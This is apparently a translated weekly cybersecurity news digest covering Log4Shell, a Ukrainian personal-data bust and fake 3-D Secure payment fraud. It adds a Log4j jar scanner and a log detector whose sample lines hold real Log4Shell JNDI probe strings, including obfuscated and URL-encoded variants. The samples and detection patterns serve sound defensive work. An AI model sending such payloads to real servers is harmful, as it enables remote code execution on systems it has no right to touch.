We’ve collected the most important news from the world of cybersecurity this week.
- Bug 10 out of 10: experts are alarmed by a vulnerability in the Log4j library that gives attackers remote access to devices and servers. It is being called one of the most serious vulnerabilities of recent years.
- In Ukraine, suspects in the sale of databases of personal data on 300 million people were detained.
- Fraudsters stole more than 3 billion rubles from residents of the Russian Federation through fake payment pages.
Cyber pandemic: hackers are mass-exploiting a vulnerability in Log4j. Experts call it the most serious bug in recent years.
Researchers have discovered a critical vulnerability in the popular Apache Log4j Java logging library. It lets attackers run code remotely on devices and servers without extensive technical skills: a specially crafted string in any input that the application logs makes the library fetch and execute attacker-supplied code. The vulnerability has been named Log4Shell.
The experts are truly alarmed. The UK National Cyber Security Centre (NCSC) and the US Cybersecurity and Infrastructure Security Agency (CISA) called the bug potentially the most serious one found in recent years. On the Common Vulnerability Scoring System (CVSS) scale, the vulnerability received 10 out of 10 possible points.
Log4j is used in many systems, including those of Amazon, Apple iCloud, Cisco, Cloudflare, Elasticsearch, Red Hat, Steam, Tesla and Twitter, so the scale of Log4Shell exploitation could be colossal.
According to Bloomberg, the first reports of the vulnerability appeared at the end of November. Some time later the bug was being discussed on WeChat, and hackers began exploiting Log4Shell.
According to 360 Netlab experts, attackers used the exploit to drop the Mirai and Muhstik malware onto devices. With their help, hackers launched cryptominers, mounted large-scale DDoS attacks, or installed Cobalt Strike beacons.
The Apache Software Foundation developers released an emergency update… However, new bugs were found in that fix, after which the project released a further update, 2.16.0…
Almost all Log4j 2 versions, from 2.0-beta9 to 2.14.1, are vulnerable. The simplest and most effective protection against Log4Shell is to update to the latest version of the library urgently, specialists say. Teams that cannot upgrade at once should, as the Apache advisory recommends, remove the JndiLookup class from the log4j-core jar on the classpath and treat the Java process as exposed until the update lands; note that the library can be present in a way the file name does not reveal, for example repackaged inside an application's own jar.
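The version range above is easy to get wrong in a script (a plain string compare puts "2.9" after "2.14.1", and pre-releases such as 2.0-beta9 need their own ordering), and a file name alone does not tell you whether log4j-core is hidden inside a fat jar or whether the JndiLookup class has already been removed. The following added example, not code from the article or from the Apache project, scans a directory for jars, looks inside each one, and classifies it against the ranges the article gives (vulnerable: 2.0-beta9 to 2.14.1; incomplete fix: 2.15.0; fixed: 2.16.0 and later). The `demo_scan` function builds constructed sample jars in a temporary directory; the `FIXED_BACKPORTS` entry for 2.12.2 (a fixed release for older Java that falls inside the numeric range) is my addition, not something the article states.

```python
"""Added example: find Log4j 2 jars on disk and judge them against the Log4Shell
version range (2.0-beta9 to 2.14.1) and the follow-up releases 2.15.0 / 2.16.0.
Not code from the original article; 'demo_scan' builds constructed sample jars."""
import re
import tempfile
import zipfile
from pathlib import Path

_PRE_RANK = {"beta": 0, "rc": 1}          # pre-releases sort below the final release
_VERSION = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?$")

def parse_version(v: str) -> tuple:
    """Order Log4j versions correctly: 2.0-beta9 < 2.0-rc1 < 2.0 < 2.14.1.
    A plain string compare gets this wrong ('2.14.1' < '2.9')."""
    m = _VERSION.match(v.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version {v!r}")
    major, minor, patch, pre, n = m.groups()
    return (int(major), int(minor), int(patch or 0),
            _PRE_RANK[pre] if pre else 2, int(n or 0))

VULN_FROM, VULN_TO = parse_version("2.0-beta9"), parse_version("2.14.1")
FULL_FIX = parse_version("2.16.0")
# Assumption added here: backport releases for older Java that sit inside the
# numeric range but are fixed. Extend this set from the vendor advisory.
FIXED_BACKPORTS = {"2.12.2"}

def assess(version: str) -> str:
    v = version.strip()
    if v in FIXED_BACKPORTS:
        return "fixed"
    pv = parse_version(v)
    if pv < VULN_FROM:
        return "outside Log4Shell range"   # Log4j 1.x is end-of-life; review it separately
    if pv <= VULN_TO:
        return "vulnerable"
    if pv < FULL_FIX:
        return "partial fix (2.15.0): update again"
    return "fixed"

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
_JAR_NAME = re.compile(r"^log4j-core-(.+)\.jar$")

def inspect_jar(path: Path) -> dict:
    """Look inside the jar: shaded/fat jars hide log4j-core behind another file name,
    and a jar whose JndiLookup class was deleted is mitigated whatever its version."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        has_core = any(n.startswith("org/apache/logging/log4j/core/") for n in names)
        version = None
        m = _JAR_NAME.match(path.name)
        if m:
            version = m.group(1)
        elif POM_PROPS in names:                       # version recorded by the Maven build
            for line in zf.read(POM_PROPS).decode().splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
    if not has_core:
        return {"jar": path.name, "version": None, "verdict": "no log4j-core"}
    if JNDI_CLASS not in names:
        verdict = "mitigated (JndiLookup.class removed)"
    elif version is None:
        verdict = "log4j-core present, version unknown: inspect manually"
    else:
        verdict = assess(version)
    return {"jar": path.name, "version": version, "verdict": verdict}

def scan_tree(root: Path) -> dict:
    """Map jar name -> verdict for every .jar below root."""
    return {r["jar"]: r["verdict"] for r in map(inspect_jar, root.rglob("*.jar"))}

def _make_jar(path: Path, version: str, jndi: bool, core: bool = True) -> None:
    """Constructed sample jar holding only the entries the scanner looks at."""
    path.parent.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(path, "w") as zf:
        if core:
            zf.writestr(POM_PROPS, f"version={version}\n")
            zf.writestr("org/apache/logging/log4j/core/Logger.class", b"")
        if jndi:
            zf.writestr(JNDI_CLASS, b"")

def demo_scan() -> dict:
    """Scan a temporary tree of constructed jars and return {name: verdict}."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        _make_jar(root / "lib" / "log4j-core-2.14.1.jar", "2.14.1", jndi=True)
        _make_jar(root / "lib" / "log4j-core-2.15.0.jar", "2.15.0", jndi=True)
        _make_jar(root / "lib" / "log4j-core-2.16.0.jar", "2.16.0", jndi=True)
        _make_jar(root / "app-fat.jar", "2.14.1", jndi=False)   # class deleted from a shaded jar
        _make_jar(root / "lib" / "other.jar", "", jndi=False, core=False)
        return scan_tree(root)

if __name__ == "__main__":
    for jar, verdict in demo_scan().items():
        print(f"{jar:28} {verdict}")
```

Point `scan_tree` at an application's deployment directory to get the same verdicts for real jars. The scanner reads the Maven `pom.properties` that log4j-core ships with, so a repackaged copy with no version in its file name is still classified; a jar it cannot version is reported for manual review rather than silently passed.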
However, experts cannot yet fully assess the scale of the consequences. Bitdefender has already identified ransomware abusing Log4Shell, while Netlab reported the discovery of at least ten hacker groups exploiting the bug. The vulnerability affected almost half of corporate networks in Russia, writes “B”…
Check Point Research has recorded more than 800,000 attack attempts exploiting Log4Shell and a proliferation of new variations of the original exploit: there are already over 60 of them. Most variations are obfuscations of the same lookup string (case-changing and default-value lookups nested inside it, URL encoding), aimed at slipping past filters that only look for the literal `${jndi:` prefix.
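Because the exploit variants differ mainly in how the lookup string is disguised, a detection rule has to undo the disguise before matching. The following added example, not code from the article or from Check Point, resolves nested Log4j lookups from the inside out the way the library does (`${lower:...}`/`${upper:...}`, the `${name:-default}` form, and URL encoding) and reports the JNDI target of every probe in a web access log. The `SAMPLE_LOG` lines are constructed for the example; the addresses are from the 203.0.113.0/24 documentation range.

```python
"""Added example: spot Log4Shell probe strings in web server logs, including the
obfuscated variants (case lookups, default-value tricks, URL encoding) that defeat a
plain '${jndi:' signature. Not code from the original article; SAMPLE_LOG is constructed."""
import re
from urllib.parse import unquote

_INNERMOST = re.compile(r"\$\{([^${}]*)\}")               # a ${...} with nothing nested inside
_DEFAULT = re.compile(r"^(.*?):-(.*)$", re.S)             # ${name:-default}  -> default
_CASE = re.compile(r"^(lower|upper):(.*)$", re.I | re.S)  # ${lower:J}        -> j

def resolve_lookups(text: str) -> list:
    """Peel lookups from the inside out, the way Log4j would, and collect the
    target of every ${jndi:...} that emerges. Returns the JNDI URIs found."""
    text = unquote(unquote(text))        # twice: attackers double-encode to survive one decode
    found = []

    def step(m):
        body = m.group(1)
        if body[:5].lower() == "jndi:":
            found.append(body[5:])
            return "\x00"                # placeholder with no '${' so outer wrappers still unwrap
        c = _CASE.match(body)
        if c:
            return c.group(2).lower() if c.group(1).lower() == "lower" else c.group(2).upper()
        d = _DEFAULT.match(body)
        if d:
            return d.group(2)
        return body                      # unknown lookup (env, sys, date...): keep its text only

    prev = None
    while prev != text:                  # each pass removes at least one ${...}, so this ends
        prev, text = text, _INNERMOST.sub(step, text)
    return found

def scan_access_log(lines) -> list:
    """(line number, decoded JNDI URI) for every probe found in an access log."""
    hits = []
    for n, line in enumerate(lines, 1):
        for uri in resolve_lookups(line):
            hits.append((n, uri))
    return hits

# Constructed sample lines in Apache combined format; 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=${${lower:j}ndi:${lower:l}dap://203.0.113.8/o} HTTP/1.1" 400 0 "-" "curl/7.68.0"',
    '203.0.113.9 - - [10/Dec/2021:12:00:04 +0000] "GET /%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Armi%3A%2F%2F203.0.113.9%2Fo%7D HTTP/1.1" 404 0 "-" "-"',
    '10.0.0.6 - - [10/Dec/2021:12:00:05 +0000] "GET /docs/${version} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, uri in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup to {uri}")
```

A literal `${jndi:` search matches only the second sample line; resolving the lookups first also catches the nested and URL-encoded probes on lines 3 and 4 while leaving the harmless `${version}` on line 5 alone. Run it over every logged field an attacker controls (User-Agent, X-Forwarded-For, usernames, form fields), not just the request line. This is triage, not a control: the obfuscation space is open-ended, so matches tell you who is probing and where the callback server is, while the patch or the JndiLookup removal is what actually closes the hole.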
“This is clearly one of the most serious Internet vulnerabilities in recent years. When we discussed the possibility of a cyber pandemic, this is exactly what we had in mind: rapidly spreading destructive attacks,” the experts summed up.
In Ukraine, the sale of personal-data databases with information on 300 million people was stopped
Ukrainian cyber police identified 51 suspects in the distribution of databases of personal data of citizens of Ukraine, Europe and the United States.
During Operation DATE, law enforcement officers seized about 100 databases with data on 300 million people, totalling more than 90,000 GB. The data in them dates from 2020-2021.
The databases contained data on bank and company customers, login credentials for e-mail, social networks and online stores, and more.
Law enforcement officers also shut down one of the largest sites selling personal data, including names, phone numbers and registered addresses.
Microsoft fixes bug used by Emotet and Google fixes zero-day vulnerability
Microsoft fixed a vulnerability exploited by the Emotet malware. It could be used in phishing campaigns targeting Windows users.
This week, Google developers also released a new version of Chrome that fixes a zero-day vulnerability under active attack.
Fraudsters stole more than 3 billion rubles from Russians through fake payment pages
Group-IB experts told Cryplogger about a fraud scheme using fake payment pages. The damage to customers of Russian banks was estimated at 3.15 billion rubles.
According to the experts, scammers have begun to fake 3-D Secure pages, which are used to secure online card payments.
The danger of fake payment pages is that they are hard to identify: they often carry the logos of the international payment systems Visa and Mastercard or the Russian Mir and so arouse no suspicion among buyers, Group-IB said.
“Attracted by fraudulent advertisements, spam mailings, or bulletin-board advertisements, a buyer visits a phishing page of an online store, marketplace or online service. Having chosen a product or service, the victim enters the details of his bank card into the payment acceptance form on a fraudulent resource,” the experts explain.
The card details go to the fraudsters' server, which then calls the banks' P2P transfer services, naming one of the cybercriminals' cards as the recipient. The fake 3-D Secure page is what makes this work: the one-time code the victim types into it, believing it confirms a purchase, actually confirms the transfer to the fraudsters' card.
Every day, Russian users made over 11,000 payments through such phishing pages, totalling 8.6 million rubles.
Lantern VPN service uses a decentralised tool to get around possible blocking in the Russian Federation
The VPN service Lantern, which could face blocking in Russia, has responded to the threat.
“In its unjustified attempts to create a centrally controlled Internet, the Russian government is tightening the noose around the ability of Russian citizens to use modern technology to realize fundamental human rights,” the statement said.
Lantern said they were not surprised by Roskomnadzor’s interest in the service, “especially after the recent news of Russia’s aggressive attacks against the Tor network.”
“What’s more, Lantern has integrated a censorship-resistant, decentralized content distribution tool that is currently available to Russian users on desktop computers and is coming to mobile devices this month.”
As a reminder, in early December Roskomnadzor contacted companies that use the VPN services Betternet, Lantern, X-VPN, Cloudflare WARP, Tachyon VPN and PrivateTunnel. According to the agency, these services help users bypass restrictions and gain access to information banned in the Russian Federation.
The State Duma introduced bills on uniform rules for remote voting and on abolishing it
The State Duma registered a draft law on uniform rules for conducting remote electronic voting (DEG) for all regions and for elections at every level.
The head of the Central Election Commission, Ella Pamfilova, reported that next year the number of regions in which DEG is used is planned to expand.
At the same time, a group of Communist Party deputies submitted to the State Duma a bill abolishing DEG in Russian elections.
What to read on the weekend?
Almost a year ago, an attack came to light on US government systems, and then on many companies around the world, delivered through trojanised software from SolarWinds. Against the backdrop of widespread concern about the consequences of the Log4j vulnerability, we recall the hack, which was called one of the most sophisticated and largest in recent years.